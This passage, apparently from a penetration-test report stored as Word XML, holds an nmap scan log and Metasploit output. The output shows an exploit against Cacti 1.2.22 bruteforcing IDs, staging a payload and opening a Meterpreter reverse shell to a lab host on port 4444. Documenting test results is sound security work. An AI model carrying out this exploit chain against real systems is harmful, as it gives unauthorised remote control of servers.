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Sun Jul  7 03:38:31 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.00070s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(0.00076s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Sun Jul  7 03:38:38 2024 -- 2 IP addresses (2 hosts up) scanned in 7.82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Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[+] The target appears to be vulnerable. The target is Cacti version 1.2.22</w:t>
        <w:br/>
        <w:t>[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations</w:t>
        <w:br/>
        <w:t>[*] Enumerating local_data_id values for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 1 opened (10.33.102.224:4444 -&gt; 10.33.102.225:59180) at 2024-07-07 03:41:44 +0700</w:t>
        <w:br/>
        <w:t>[+] Found exploitable local_data_id 15 for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Command Stager progress - 100.00% done (1118/1118 bytes)</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</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10.33.102.225:59180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